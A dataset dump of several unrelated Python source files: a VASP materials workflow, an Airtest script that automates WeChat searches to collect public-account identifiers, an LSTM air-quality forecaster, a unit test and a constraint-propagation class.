incar['ISMEAR'] = 1\n incar['ISIF'] = 2\n # kpoints\n kpoints = Kpoints.monkhorst_automatic(kpts=(18, 18, 1))\n # load in previous jobs\n relaxed_sub_jobs = Calibrate.jobs_from_file('step2_sub.json')\n relaxed_2d_jobs = Calibrate.jobs_from_file('step2_2d.json')\n # create list of all substrate poscars\n all_poscars = []\n # loop over aligned & relaxed substrates and 2d\n for jsub, j2d in zip(relaxed_sub_jobs,relaxed_2d_jobs):\n # substrate\n job_dir_sub = os.path.join(jsub.parent_job_dir, jsub.job_dir)\n contcar_file = os.path.join(job_dir_sub, 'CONTCAR')\n # read in as structure object\n substrate_slab_aligned = Structure.from_file(contcar_file)\n species_sub = ''.join([tos.symbol for tos in substrate_slab_aligned.types_of_specie])\n # 2d\n job_dir_2d = os.path.join(j2d.parent_job_dir, j2d.job_dir)\n contcar_file = os.path.join(job_dir_2d, 'CONTCAR')\n # read in as structure object \n mat2d_slab_aligned = Structure.from_file(contcar_file)\n species_2d = ''.join([tos.symbol for tos in mat2d_slab_aligned.types_of_specie])\n # position the aligned materials in all possible ways\n hetero_interfaces = generate_all_configs(mat2d_slab_aligned,\n substrate_slab_aligned,\n nlayers_2d,\n nlayers_sub,\n seperation )\n # loop over all hetero-interfaces\n for i, iface in enumerate(hetero_interfaces):\n sd_flags = CalibrateSlab.set_sd_flags(interface=iface,\n n_layers=nlayers_2d+nlayers_sub,\n top=True, bottom=False)\n poscar = Poscar(iface, selective_dynamics=sd_flags)\n poscar.comment = '_'.join([species_sub,species_2d,str(i)])\n all_poscars.append(poscar)\n # setup 
calibrate and run'em\n turn_knobs = OrderedDict(\n [\n ('POSCAR', all_poscars)\n ])\n qadapter, job_cmd = get_run_cmmnd(nnodes=nnodes, nprocs=nprocs,\n walltime=walltime,\n job_bin=bin_sub, mem=mem)\n run_cal(turn_knobs, qadapter, job_cmd, job_dir,\n name, incar=incar, kpoints=kpoints)\n return [name+'.json']\n\n\nif __name__ == '__main__':\n # functions will be run in the order given in the list\n steps = [step1, step2, step3]\n error_handlers = [VaspErrorHandler()]\n # update interval\n interval = 300\n Calibrate.launch_daemon(steps, interval, error_handlers)\n","sub_path":"examples/workflows/graphene_on_metal.py","file_name":"graphene_on_metal.py","file_ext":"py","file_size_in_byte":11344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"320750209","text":"# -*- encoding=utf8 -*-\n__author__ = \"Administrator\"\nimport itertools\nimport traceback\n\nfrom airtest.core.api import *\nfrom poco.drivers.android.uiautomation import AndroidUiautomationPoco\nimport redis\nimport pymongo\nimport pandas as pd\n\nimport helper\n\n\nclass AirTestSpider:\n \"\"\"\n airtest 抓取文本信息和触发点击事件,mitmproxy 抓取相关网络信息,通过 redis 通信\n \"\"\"\n\n def __init__(self, device_host):\n auto_setup(__file__)\n\n self.device_1 = connect_device(f'android:///{device_host}?cap_method=javacap&touch_method=adb')\n self.device_name = 'xiaoyao'\n self.poco = AndroidUiautomationPoco(self.device_1, screenshot_each_action=False)\n\n self.client = pymongo.MongoClient()\n self.dp_db = self.client['DianPing']\n\n self.wechat_db = self.client['WeChatOfficialAccount']\n self.wechat_col = self.wechat_db['wechat_search_info']\n self.pandas_col = self.wechat_db['pandas_info']\n\n self.redis_cli = redis.StrictRedis(decode_responses=True)\n self.biz_queue = f'{self.device_name}_wechat_biz'\n self.url_queue = f'{self.device_name}_article_url'\n\n self.wx_package_name = 'com.tencent.mm'\n self.city_en_list = ['guangzhou', 'dongguan', 'foshan', 'huizhou', 'zhongshan', 'zhuhai']\n\n self.count = 0\n\n def to_search_entrance(self):\n \"\"\"\n 进入微信搜索入口\n :return:\n \"\"\"\n try:\n # 点击首页搜索图标\n self.poco(\"com.tencent.mm:id/jb\").click()\n # 搜索项选择公众号\n self.poco(text=\"公众号\").click()\n except Exception as e:\n print('进入搜索入口失败')\n traceback.print_exc()\n\n def get_item_info(self, keyword):\n \"\"\"\n 获取搜索的公众号基础信息,不包括 biz 和 第一篇文章 url\n :param keyword:\n :return:\n \"\"\"\n # 清空输入框\n self.poco(\"com.tencent.mm:id/l3\").set_text('')\n # 点击输入框\n self.poco(\"com.tencent.mm:id/l3\").click()\n # 输入关键词\n text(keyword, search=True)\n sleep(3)\n # 出现微信推荐搜索时,点击进入仍然搜索页面\n still_search_button = self.poco(nameMatches='.*?仍然搜索.*?')\n if still_search_button.exists():\n print('进入点击')\n still_search_button.click()\n # 搜集搜索项\n nodes = self.poco(name=\"搜一搜\").children()\n if len(nodes) > 2:\n item_info_dict = self.parse_nodes(nodes)\n return item_info_dict\n\n @staticmethod\n def parse_nodes(nodes):\n \"\"\"\n :param nodes:\n :return:\n \"\"\"\n # compress 过滤出迭代元素中 True 的元素\n search_result = itertools.compress(nodes, [node.attr('touchable') for node in nodes])\n search_result = [i.get_name() for i in search_result][1:]\n for i in search_result:\n # 去除干扰项\n if i in ['正在搜索', '没有更多的搜索结果', '3f5d81b43a891e3abe270d49cd6ce850']:\n search_result.remove(i)\n dic_list = helper.parse_search_list(search_result)\n return dic_list[0]\n\n def click_article(self):\n \"\"\"\n 点击公众号和首条文章\n :return:\n \"\"\"\n # 点击第一个搜索项\n # self.poco(\"android.webkit.WebView\").child('搜一搜').child('android.view.View')[0].click()\n 
self.poco(\"搜一搜\").children()[1].click()\n # 验证公众号是否包含一篇及以上文章\n article = self.poco('com.tencent.mm:id/b3q')\n biz, article_url = '', ''\n if article.exists():\n article.click()\n sleep(2)\n biz = self.from_redis_get_info(self.biz_queue)\n article_url = self.from_redis_get_info(self.url_queue)\n if biz is None:\n print('找不到 biz ,请查看具体情况')\n else:\n # blpop 取出来是一个元祖,需取第一个元素\n biz = biz[1]\n article_url = article_url[1]\n sleep(0.5)\n # 点击关闭文章按钮\n self.poco(\"com.tencent.mm:id/kx\").click()\n kf = self.poco(\"com.tencent.mm:id/kf\")\n if kf.exists():\n kf.click()\n else:\n self.poco(\"com.tencent.mm:id/kx\").click()\n return biz, article_url\n\n def from_redis_get_info(self, name):\n info = self.redis_cli.blpop(name, timeout=3)\n return info\n\n def restart_app_to_search(self):\n stop_app(self.wx_package_name)\n start_app(self.wx_package_name)\n sleep(3)\n self.to_search_entrance()\n\n def inspect_current_page(self):\n \"\"\"\n 检测当前页面\n :return:\n \"\"\"\n if self.poco(\"当前所在页面,与的聊天\").exists():\n print('现在 app 在首页位置,准备进入搜索入口')\n self.to_search_entrance()\n elif self.poco(\"当前所在页面,搜一搜\").exists():\n print('现在 app 在搜索入口,准备进行搜索')\n elif self.poco('com.tencent.mm:id/b1o').exists():\n print('现在在公众号信息页面,准备返回搜索入口')\n self.poco(\"com.tencent.mm:id/kb\").click()\n else:\n print('app 页面未检测到,准备重启')\n self.restart_app_to_search()\n return\n\n def search_and_click(self, name):\n \"\"\"\n 完整流程\n :param name:\n :return:\n \"\"\"\n print('准备搜索公众号: ', name)\n try:\n item_info_dic = self.get_item_info(name)\n if item_info_dic:\n # 保存搜索名字\n item_info_dic['search_name'] = name\n biz, article_url = self.click_article()\n if biz and article_url:\n item_info_dic['biz'] = biz\n item_info_dic['article_url'] = article_url\n else:\n item_info_dic = {'search_name': name}\n return item_info_dic\n except Exception as e:\n traceback.print_exc()\n self.inspect_current_page()\n\n def mongo_run(self):\n self.inspect_current_page()\n\n for city_en in self.city_en_list:\n col = self.dp_db[f'dp_{city_en}_mall']\n mall_names = [mall.get('fullName') for mall in list(col.find())]\n for mall_name in mall_names:\n mall_wechat_info = self.wechat_col.find_one({'search_name': mall_name})\n if mall_name and not mall_wechat_info:\n\n # if self.count == 200:\n # self.count = 0\n # time.sleep(3600)\n # else:\n # self.count += 1\n\n item_info_dic = self.search_and_click(mall_name)\n if item_info_dic:\n print(item_info_dic)\n self.wechat_col.update_one({'search_name': item_info_dic['search_name']}, {'$set': item_info_dic}, True)\n\n print('数据抓取结束')\n\n def pandas_run_help(self, data):\n if self.pandas_col.find_one({'微信': data['微信']}):\n return\n item_info_dic = self.search_and_click(data['微信'])\n if item_info_dic:\n data['gzh_id'] = item_info_dic.get('biz')\n data['wechat_name'] = item_info_dic.get('wechat_name')\n data['wechat_url'] = item_info_dic.get('article_url')\n self.pandas_col.update_one({'微信': data['微信']}, {'$set': data.to_dict()}, True)\n print(data.to_dict())\n return\n\n def pandas_run(self):\n path = r'C:Users\\Administrator\\Desktop\\test_brand.xls'\n df = pd.read_excel(path)\n df.apply(lambda x: self.pandas_run_help(x), axis=1)\n\n def test_run(self):\n # 测试出现任然搜索的情况\n self.search_and_click('beceas')\n\n\ndef main():\n device_host = '127.0.0.1:21503'\n air_spider = AirTestSpider(device_host)\n air_spider.mongo_run()\n # air_spider.pandas_run()\n # air_spider.test_run()\n\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"xiaoyao_simulator/airtest_xiaoyao_phone.py","file_name":"airtest_xiaoyao_phone.py","file_ext":"py","file_size_in_byte":8239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"641733905","text":"\"\"\"\r\nKDD Cup 2018 Fresh Air\r\n:training: Beijing historical data\r\n\"\"\"\r\n\r\nfrom math import sqrt\r\nfrom pandas import read_csv\r\nfrom matplotlib import pyplot\r\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler\r\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, LSTM, Dropout\r\n\r\nimport datetime as dt\r\nimport pandas as pd\r\nimport numpy as np\r\nimport os\r\n\r\nimport lstm_data as ld\r\nimport build_test_data as bt\r\nimport submit\r\n\r\ndebug = True\r\ndesired_width = 250\r\npd.set_option('display.width', desired_width)\r\nnp.set_printoptions(linewidth=desired_width)\r\n\r\ndef show_dataframe(df, head=5):\r\n if head > 0:\r\n print('------------- Head({}) --------------'.format(head))\r\n print(df.head(head))\r\n\r\n print('------------- Columns -----------------')\r\n for col in df.columns.tolist():\r\n if df[col].dtype in ['float32', 'int32', 'float64', 'int64']:\r\n print(' {:15s} = {:10.3f} ~ {:10.3f}, NaN = {}'.format(col, df[col].min(), df[col].max(), df[col].isnull().sum()))\r\n\r\n\r\ndef load_historical_data(file='data/Beijing_historical_data.csv', include_weather=False):\r\n \"\"\" Attribute Information: (input)\r\n original w/o stationid --> reorder for predict\r\n :stationid: station id (0) string\r\n :weekofday: (0) inserted (0) weekofday\r\n :time: date format (1) datetime (1) HH only (1) HH\r\n :temperature: real (2) real (2) (2) PM25 --> Predict\r\n :pressure: real (3) real (3) (3) PM10 --> Predict\r\n :humidity: real (4) real (4) (4) O3 --> Predict\r\n :winddirection: real (5) real (5) (5) NO2 --> Predict\r\n :windspeedkph: real (6) real (6) (6) CO --> Predict\r\n :PM25: real (7) real (7) => predict =(-6) (7) SO2 --> Predict\r\n :PM10: real (8) real (8) => predict =(-5) (8) temperature\r\n :NO2: real (9) real (9) => predict =(-4) (9) pressure\r\n :CO: real (10) real (10) => predict =(-3) (10) humidity\r\n :O3: real (11) real (11) => predict =(-2) (11) winddirection\r\n :SO2: real (12) real (12) => predict =(-1) (12) windspeed\r\n \"\"\"\r\n\r\n if not os.path.exists(file):\r\n ValueError(\"file Not found {}\".format(file))\r\n return\r\n\r\n # load dataset\r\n if include_weather:\r\n column_list = ['stationid', 'time', 'temperature', 'pressure', 'humidity',\r\n 'winddirection', 'windspeed', 'weather', 'PM25', 'PM10', 'NO2', 'CO', 'O3', 'SO2']\r\n else:\r\n column_list = ['stationid', 'time', 'temperature', 'pressure', 'humidity',\r\n 'winddirection', 'windspeed', 'PM25', 'PM10', 'NO2', 'CO', 'O3', 'SO2']\r\n\r\n df = read_csv(file, parse_dates=['time'], header=0, names=column_list)\r\n\r\n # generate new column 'weekday' from datetime\r\n df['weekday'] = df['time'].dt.dayofweek\r\n\r\n # use only HH (daytime hour)\r\n df['time'] = df['time'].dt.hour\r\n\r\n # reorder\r\n # (stationid=1) + (utctime=0) + (weekday=-1) + ...\r\n if include_weather:\r\n reordered_list = ['stationid', 'time', 'weekday', 'PM25', 'PM10', 'O3', 'NO2', 'CO', 'SO2',\r\n 'temperature', 'pressure', 'humidity', 'winddirection', 'windspeed', 'weather']\r\n else:\r\n reordered_list = ['stationid', 'time', 'weekday', 'PM25', 'PM10', 'O3', 'NO2', 'CO', 'SO2',\r\n 'temperature', 'pressure', 'humidity', 
'winddirection', 'windspeed']\r\n\r\n df = df[reordered_list]\r\n\r\n # mark all NA values with previous record value (ffill)\r\n df.replace(999017.0, np.nan, inplace=True)\r\n df.replace(999999.0, np.nan, inplace=True)\r\n df.fillna(method='ffill', inplace=True)\r\n\r\n # drop left NaN\r\n df.dropna(inplace=True)\r\n\r\n # show dataFrame shortly\r\n # if debug:\r\n # show_dataframe(df, 5)\r\n\r\n # n_features, n_ignore (last 5 attributes)\r\n n_features = len(df.columns.tolist()) - 1\r\n n_ignore = 5\r\n\r\n return df, n_features, n_ignore\r\n\r\n\r\ndef reframed_for_lstm(df, n_steps=6, n_features=13, n_ignore=5, include_weather=False):\r\n # get list of stations\r\n stations = df['stationid'].unique()\r\n if debug:\r\n print('reframed for LSTM')\r\n print('n_features = {}'.format(n_features))\r\n print('target {} stations: {}'.format(len(stations), stations))\r\n\r\n data = [ ]\r\n i = 0\r\n for station in stations:\r\n if debug and i == 0:\r\n print('#{}: station = {}'.format(i, station))\r\n\r\n df1 = df[df['stationid'] == station]\r\n df1 = df1.drop(columns=df1.columns[0], axis=1)\r\n\r\n if debug and i == 0:\r\n print('Shape = {}, Columns = {}'.format(df1.shape, df1.columns.tolist()))\r\n\r\n # integer encode weather (non integer/float type)\r\n if include_weather:\r\n encoder = LabelEncoder()\r\n df1.loc[:, 'weather'] = encoder.fit_transform(df1.loc[:, 'weather'])\r\n\r\n # ensure all data is float\r\n values = df1.values\r\n values = values.astype('float64')\r\n\r\n if debug and i == 0:\r\n dd = pd.DataFrame(values)\r\n print('before scaled = shape {}'.format(dd.shape))\r\n #print(dd.head(100))\r\n #print(dd.tail(200))\r\n #print('station: {} -> {}'.format(station, values[1, :]))\r\n\r\n # normalize features\r\n scaler = MinMaxScaler(feature_range=(0, 1))\r\n scaler.fit(values)\r\n scaled = scaler.transform(values)\r\n\r\n # frame as supervised learning\r\n if debug and i == 0:\r\n dd = pd.DataFrame(scaled)\r\n print('scaled columns = #{} -> {}'.format(len(dd.columns.tolist()), dd.columns.tolist()))\r\n\r\n reframed = ld.series_to_supervised(scaled, n_steps, 1)\r\n if debug and i == 0:\r\n print(\"after reframed = shape {}\".format(reframed.shape))\r\n #print(reframed.tail(5))\r\n\r\n # drop columns we don't want to predict (last utctime ~ weather)\r\n reframed.drop(reframed.columns[[range(-n_ignore, 0, 1)]], axis=1, inplace=True)\r\n if debug and i == 0:\r\n print('reframed columns = #{} -> {}'.format(len(reframed.columns.tolist()), reframed.columns.tolist()))\r\n print(\"after re-framed.drop = shape {}\".format(reframed.shape))\r\n #print(reframed.tail(5))\r\n\r\n item = {}\r\n item['station'] = station\r\n item['data'] = reframed\r\n item['scaler'] = scaler\r\n data.append(item)\r\n\r\n i += 1\r\n else:\r\n if debug:\r\n print('load {} stations data'.format(len(stations)))\r\n return data\r\n\r\n\r\nclass RNN_LSTM(object):\r\n def __init__(self, param_data, n_steps=6, n_features=13, n_ignore=5, n_nodes=50):\r\n self.n_steps = n_steps\r\n self.n_features = n_features\r\n self.n_ignore = n_ignore\r\n self.param_data = param_data\r\n self.station_name = param_data['station']\r\n\r\n self.loading_data(param_data, n_steps, n_features, n_ignore)\r\n self.n_nodes = n_nodes\r\n self.model = self.build_model()\r\n\r\n def loading_data(self, item, n_steps=6, n_features=13, n_ignore=5):\r\n #\r\n # split into train and test sets\r\n #\r\n values = item['data'].values\r\n n_train_hours = values.shape[0] - 24*2\r\n train = values[:n_train_hours, :]\r\n test = values[n_train_hours:, 
:]\r\n\r\n if debug:\r\n print('X: train = {}, test = {}'.format(train.shape, test.shape))\r\n\r\n # split into input and outputs\r\n n_obs = n_steps * n_features\r\n train_X, train_y = train[:, :n_obs], train[:, n_obs:]\r\n test_X, test_y = test[:, :n_obs], test[:, n_obs:]\r\n\r\n # reshape input to be 3D [samples, timesteps, features]\r\n train_X = train_X.reshape((train_X.shape[0], n_steps, n_features))\r\n test_X = test_X.reshape((test_X.shape[0], n_steps, n_features))\r\n if debug:\r\n print('Fetch: X_tr = {}, y_tr = {}, X_te = {}, y_te = {}'.format(train_X.shape, train_y.shape,\r\n test_X.shape, test_y.shape))\r\n\r\n self.name = item['station']\r\n self.scaler = item['scaler']\r\n self.X_tr = train_X\r\n self.y_tr = train_y\r\n self.X_te = test_X\r\n self.y_te = test_y\r\n\r\n def build_model(self):\r\n model = Sequential()\r\n if debug:\r\n print('LSTM_Model: LSTM node = {}, input_shape = ({}, {})'.format(self.n_nodes,\r\n self.X_tr.shape[1],\r\n self.X_tr.shape[2]))\r\n\r\n model.add(LSTM(self.n_nodes, input_shape=(self.X_tr.shape[1], self.X_tr.shape[2])))\r\n model.add(Dense(self.n_features-self.n_ignore))\r\n model.compile(loss='mae', optimizer='adam')\r\n\r\n if debug:\r\n model.summary()\r\n\r\n return model\r\n\r\n def build_model_v2(self):\r\n model = Sequential()\r\n if debug:\r\n print('LSTM_Model: LSTM node = {}, input_shape = ({}, {})'.format(self.n_nodes,\r\n self.X_tr.shape[1],\r\n self.X_tr.shape[2]))\r\n\r\n model.add(LSTM(self.n_nodes, input_shape=(self.X_tr.shape[1], self.X_tr.shape[2]), return_sequences=True))\r\n model.add(Dropout(0.2))\r\n model.add(LSTM(100, return_sequences=False))\r\n model.add(Dropout(0.2))\r\n model.add(Dense(self.n_features-self.n_ignore))\r\n model.compile(loss='mae', optimizer='adam')\r\n\r\n if debug:\r\n model.summary()\r\n\r\n return model\r\n\r\n def train(self, n_epochs=50, n_batch_size=72):\r\n history = self.model.fit(self.X_tr, self.y_tr,\r\n epochs=n_epochs,\r\n batch_size=n_batch_size,\r\n validation_data=(self.X_te, self.y_te),\r\n verbose=2, shuffle=False)\r\n return history\r\n\r\n def plot_train(self, history):\r\n pyplot.clf()\r\n pyplot.plot(history.history['loss'], label='train')\r\n pyplot.plot(history.history['val_loss'], label='test')\r\n pyplot.legend()\r\n pyplot.savefig('img/bj_{}_hist.png'.format(self.name))\r\n\r\n def plot_test(self, inv_y, inv_yhat, metrics):\r\n pyplot.clf()\r\n pyplot.figure(figsize=(9, 9))\r\n pyplot.suptitle('Station: %s, RMSE=%.3f, MAPE=%.3f, R2_Score=%.3f'%(self.name,\r\n metrics[0], metrics[1], metrics[2]))\r\n pollutants = ['PM2.5', 'PM10', 'O3', 'NO2', 'CO', 'SO2']\r\n i = 0\r\n for pollutant in pollutants:\r\n if i == 0:\r\n print('ax_plot_y : {}'.format(inv_y[:, i]))\r\n print('ax_plot_y^: {}'.format(inv_yhat[:, i]))\r\n ax = pyplot.subplot(3, 2, i+1)\r\n ax.plot(inv_y[:, i], label='y (label)')\r\n ax.plot(inv_yhat[:, i], label='^y (predict)')\r\n ax.set_title(pollutant)\r\n pyplot.legend()\r\n i += 1\r\n else:\r\n pyplot.savefig('img/bj_{}_test.png'.format(self.name))\r\n\r\n #print(\"inv_y\")\r\n #print(inv_y.head(5))\r\n #print(\"inv_yhat\")\r\n #print(inv_yhat.head(5))\r\n\r\n def validation(self, plot_image=True):\r\n y_hat = self.model.predict(self.X_te)\r\n if debug:\r\n dd = pd.DataFrame(y_hat)\r\n print('y_hat.shape= {}, value={}'.format(dd.shape, dd.values))\r\n\r\n self.X_te = self.X_te.reshape((self.X_te.shape[0], self.n_steps * self.n_features))\r\n\r\n # invert scaling for forecast\r\n inv_yhat = np.concatenate((y_hat, self.X_te[:, -self.n_ignore:]), axis=1)\r\n 
inv_yhat = self.scaler.inverse_transform(inv_yhat)\r\n inv_yhat = inv_yhat[:, -self.n_features+2:-self.n_ignore]\r\n\r\n if debug:\r\n print('y_hat = {}, inv_yhat = {}'.format(y_hat.shape, inv_yhat.shape))\r\n\r\n # invert scaling for actual\r\n inv_y = np.concatenate((self.y_te, self.X_te[:, -self.n_ignore:]), axis=1)\r\n inv_y = self.scaler.inverse_transform(inv_y)\r\n inv_y = inv_y[:, -self.n_features+2:-self.n_ignore]\r\n\r\n if debug:\r\n print('y_te = {}, inv_y = {}'.format(self.y_te.shape, inv_y.shape))\r\n\r\n # calculate RMSE, MAPE, R2\r\n rmse = sqrt(mean_squared_error(inv_y, inv_yhat))\r\n mape = mean_absolute_error(inv_y, inv_yhat)\r\n r2 = r2_score(inv_y, inv_yhat)\r\n if debug:\r\n print('Test RMSE: %.3f, MAPE: %.3f, R2 Score: %.3f' % (rmse, mape, r2))\r\n\r\n # Show data\r\n if plot_image:\r\n self.plot_test(inv_y, inv_yhat, [rmse, mape, r2])\r\n\r\n def predict(self, forecast_data, hours=48):\r\n if debug:\r\n print('------------- predict 48hours --------------')\r\n print('Shape = {}, Columns = {}'.format(forecast_data.shape, forecast_data.columns.tolist()))\r\n print(forecast_data)\r\n\r\n # ensure all data is float\r\n forecast_data.fillna(0, inplace=True)\r\n forecast_values = forecast_data.values\r\n forecast_values = forecast_values.astype('float64')\r\n\r\n # normalize features\r\n scaled = self.scaler.transform(forecast_values)\r\n\r\n if debug:\r\n dd = pd.DataFrame(scaled)\r\n print('scaled rows= {}, columns= {} -> {}'.format(len(dd), len(dd.columns.tolist()), dd.columns.tolist()))\r\n\r\n for hr in range(0, hours):\r\n step_hr = ld.series_to_supervised(scaled[hr:hr+self.n_steps+1, :], self.n_steps, 1, dropnan=False)\r\n if debug and hr == 0:\r\n print('step_hr = {}, hour = #{} ~ #{}'.format(step_hr.shape, hr, hr+self.n_steps))\r\n\r\n # drop columns we don't want to predict (last utctime ~ weather)\r\n step_hr.drop(step_hr.columns[[range(-self.n_ignore, 0, 1)]], axis=1, inplace=True)\r\n\r\n # split into input (and outputs)\r\n n_obs = self.n_steps * self.n_features\r\n if debug and hr == 0:\r\n print('step_hr = {}, n_obs = {:d}'.format(step_hr.shape, n_obs))\r\n\r\n step_np = step_hr.values\r\n X_te = step_np[:, :n_obs]\r\n\r\n # reshape input to be 3D [samples, timesteps, features]\r\n X_te = X_te.reshape((X_te.shape[0], self.n_steps, self.n_features))\r\n\r\n # predict next 1 hour\r\n y_hat = self.model.predict(X_te)\r\n\r\n #if debug:\r\n # print('#{:02d}: y_hat = {}'.format(hr, y_hat[n_steps]))\r\n # print('#{:02d}:+n_steps = {}'.format(hr, scaled[hr+n_steps, :]))\r\n scaled[hr+self.n_steps, 2:-self.n_ignore] = y_hat[self.n_steps, 2:]\r\n hr += 1\r\n else:\r\n # invert scaling for forecast\r\n scaled_back = self.scaler.inverse_transform(scaled)\r\n if debug:\r\n print('------- after predict --------')\r\n dd = pd.DataFrame(scaled_back)\r\n print(len(dd), dd)\r\n\r\n results = scaled_back[self.n_steps:, :-self.n_ignore]\r\n\r\n ft = pd.DataFrame(results, columns=['hour', 'weekday', 'PM2.5', 'PM10', 'O3', 'NO2', 'CO', 'SO2'])\r\n\r\n def gen_name_tag(row):\r\n return '{}#{}'.format(self.station_name, row.name)\r\n\r\n ft['test_id'] = ft.apply(gen_name_tag, axis=1)\r\n ft = ft[['test_id', 'PM2.5', 'PM10', 'O3']]\r\n\r\n # correct invalid output: output may not negative\r\n ft.loc[ft['PM2.5'] < 0, 'PM2.5'] = 0.01\r\n ft.loc[ft['PM10'] < 0, 'PM10'] = 0.01\r\n ft.loc[ft['O3'] < 0, 'O3'] = 0.01\r\n\r\n if debug:\r\n print('------- Prediction Data -------')\r\n print(len(ft), ft)\r\n\r\n return ft\r\n\r\n\r\ndef train_eval(n_epoch=100):\r\n if debug:\r\n 
print('######### Load Historical data for training ########')\r\n\r\n df, n_features, n_ignore = load_historical_data()\r\n\r\n if debug:\r\n print('##### n_features = {:d}, n_ignore = {:d}, records = {:d}'.format(n_features, n_ignore, len(df)))\r\n print(df.head(5))\r\n\r\n # split data by station\r\n n_steps = 6\r\n stations = reframed_for_lstm(df, n_steps, n_features, n_ignore)\r\n\r\n if debug:\r\n print('######### Build Forecasting Test data for submission ########')\r\n test_data = bt.build_test_data('bj', n_steps)\r\n\r\n if debug:\r\n print('###### forecast test: {}'.format(test_data.columns.tolist()))\r\n\r\n forecast_sum = pd.DataFrame()\r\n\r\n for station in stations:\r\n lstm = RNN_LSTM(station, n_steps, n_features, n_ignore, 200)\r\n history = lstm.train(n_epochs=n_epoch, n_batch_size=72)\r\n lstm.plot_train(history)\r\n lstm.validation()\r\n\r\n station_data = test_data[test_data['stationid'] == station['station']]\r\n station_data = station_data.drop(columns=station_data.columns[[0]], axis=1)\r\n\r\n if debug:\r\n print('###### Run Prediction: {}, Shape = {}'.format(station['station'], station_data.shape))\r\n\r\n forecast_result = lstm.predict(station_data, 48)\r\n submit.save_station('bj', station['station'], forecast_result)\r\n forecast_sum = forecast_sum.append(forecast_result, ignore_index=True)\r\n break\r\n\r\n submit.save_city('bj', forecast_sum)\r\n return forecast_sum\r\n\r\n\r\nif __name__ == '__main__':\r\n train_eval()\r\n","sub_path":"beijing_train.py","file_name":"beijing_train.py","file_ext":"py","file_size_in_byte":17873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"423064527","text":"\"\"\"\n    Tests the endpoints that start with api/codes.\n\"\"\"\nimport unittest\nfrom application import db\nfrom application.models.schema.code import Code\nfrom application.tests.base import BaseTestCase\nfrom application.tests.fixtures import setup_code_fixture\nfrom application.models.company import CompanyModel\n\n\nclass TestApiCompany(BaseTestCase):\n    def setUp(self):\n        super().setUp()\n        setup_code_fixture()\n\n    def test_insert_company(self):\n        \"\"\"\n        If no parameters are given, show the stock prices of the most recent trading session.\n        \"\"\"\n        codes = db.session.query(Code).limit(30).all()\n        company_list = CompanyModel.insert_or_update_company_from_code(codes)\n        company_name_from_codes = []\n        for code in codes:\n            company_name_from_codes.append(code.code_name)\n        company_name_from_list = []\n        for company in company_list:\n            company_name_from_list.append(company[\"code_name\"])\n\n        self.assertTrue(set(company_name_from_list) <= set(company_name_from_codes))\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"application/tests/models/test_company.py","file_name":"test_company.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"263533746","text":"import sys\nsys.path.insert(0, \"../../basic-graph-search/Graph\")\n\nfrom domgraph import DomainGraph\nimport copy\n\n\"\"\"\n\tThis class runs the Arc Consistency algorithm\n\t(Constraint Propagation), which detects bad\n\tchoices very fast while solving a CSP, increasing\n\tthe solution speed.\n\"\"\"\n\nclass ArcConsistency(DomainGraph):\n\tdef refreshDomain(self):\n\t\tfor vertex in self.transit_mat:\n\t\t\tif self.value[vertex] is not None:\n\t\t\t\tfor neighbor in self.transit_mat[vertex]:\n\t\t\t\t\tif self.value[vertex] in 
self.domain[neighbor]:\n\t\t\t\t\t\tself.domain[neighbor].remove(self.value[vertex])\n\n\tdef __backtracking__(self, changes):\n\t\tfor change in changes:\n\t\t\tvertex, val = change\n\t\t\tself.domain[vertex].update({val})\n\n\tdef consistentAttrib(self, start_vertex, value, ret_changes=True):\n\t\t\"\"\"\n\t\t\tRun Arc Consistency algorithm.\n\t\t\"\"\"\n\n\t\tchanges = []\n\t\tqueue = []\n\n\t\t# The first step is the Forward checking: if the current\n\t\t# attribution empty a neighbor domain, then that attribution\n\t\t# will not lead to a solution and, therefore, must be cancelled.\n\t\tfor neighbor in self.transit_mat[start_vertex]:\n\t\t\tif self.value[neighbor] is None:\n\t\t\t\tif self.domain[neighbor] == {value}:\n\t\t\t\t\tself.__backtracking__(changes)\n\t\t\t\t\treturn None\n\n\t\t\t\tqueue.append((start_vertex, neighbor))\n\n\t\t# Repeat for\n\t\t#\t- All adjacent vertexes of current vertex, which must be\n\t\t#\t\tthe vertex of the last CSP iteration assigment\n\t\t#\t- All vertex whose domain changed during the constraint\n\t\t#\t\tpropagation process \n\t\twhile queue:\n\t\t\tcur_edge = queue.pop(0)\n\n\t\t\tascendant, incident = cur_edge\n\n\t\t\t# A consistent domain is a domain whose\n\t\t\t# for ALL values in it, there is AT LEAST ONE another consistent\n\t\t\t# value for all non-assigned neighbors.\n\t\t\tfor val in copy.copy(self.domain[incident]):\n\t\t\t\t# If domain of ascendant (neighbor) vertex is just the current\n\t\t\t\t# value, then that value is inconsistent\n\t\t\t\tif self.domain[ascendant] == {val}:\n\t\t\t\t\tif self.domain[incident] == {val}:\n\t\t\t\t\t\t# If incident domain is just the current \"val\",\n\t\t\t\t\t\t# then the last assignment is inconsistent.\n\t\t\t\t\t\t# Undo changes and return False\n\t\t\t\t\t\tself.__backtracking__(changes)\n\t\t\t\t\t\treturn None\n\n\t\t\t\t\t# Else, remove that value from the incident vertex domain,\n\t\t\t\t\t# and add all its neighbors to the queue to verify if it\n\t\t\t\t\t# created some inconsistency due to domain change\n\t\t\t\t\tself.domain[incident].remove(val)\n\n\t\t\t\t\tchanges.append((incident, val))\n\n\t\t\t\t\tfor incident_neighbor in self.transit_mat[incident]:\n\t\t\t\t\t\t# Just verify unassigned variables (neighbors)\n\t\t\t\t\t\tif self.value[incident_neighbor] is None:\n\t\t\t\t\t\t\tqueue.append((incident, incident_neighbor))\n\n\t\t# Process of propagating constraints ended successfully\n\t\tself.value[start_vertex] = value\n\n\t\t# Remove given value just in case, due to backtracking possibilities\n\t\tself.domain[start_vertex].remove(value)\n\t\tchanges.append((start_vertex, value))\n\n\t\t# The reason for returning the changes are to enable future\n\t\t# backtrackings, if necessary, in the next CSP 